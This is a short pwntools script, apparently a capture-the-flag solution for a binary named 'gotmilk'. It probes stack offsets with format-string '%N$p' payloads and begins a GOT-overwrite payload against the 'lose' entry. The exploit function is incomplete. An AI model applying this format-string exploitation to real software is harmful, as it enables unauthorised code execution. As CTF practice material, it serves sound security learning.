from pwn import *

def offset_finder():
# By using this function we can find out that our input is stored at offset eleven of the stack

    for x in range (1, 100):
        p = process("./gotmilk")
        # p = remote("stack.overflow.fail", 9002)
            
        print "Offset number {}".format(x)

        payload = ""
        #payload += "B" * 2
        payload += "A" * 4
        payload += "%{}$p".format(x)

        p.sendline(payload)
            
        p.recvuntil("answer: ")
        #print p.recv()[4:-1]
        stack_value = p.recvline()[4:-1]
        if stack_value.find("41414141") != -1:
            print "Offset found!"
            print "Stack value: {}".format(stack_value)
            break
        else:
            print "Stack value: {}".format(stack_value)
            
        p.close()

def exploit():
    libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so", checksec = False)
    binary = ELF("gotmilk")
    lose_got = binary.symbols["got.lose"]
    log.info("lose@got : 0x{0:x}".format(lose_got))
    main_addr = binary.symbols["main"]
    log.info("Main address : 0x{0:x}".format(main_addr))
    
    payload = ""
    payload += "A" * 7
    payload += p32(lose_got)
    payload += p32(lose_got + 2)

if __name__ == "__main__":
    #offset_finder()
    exploit()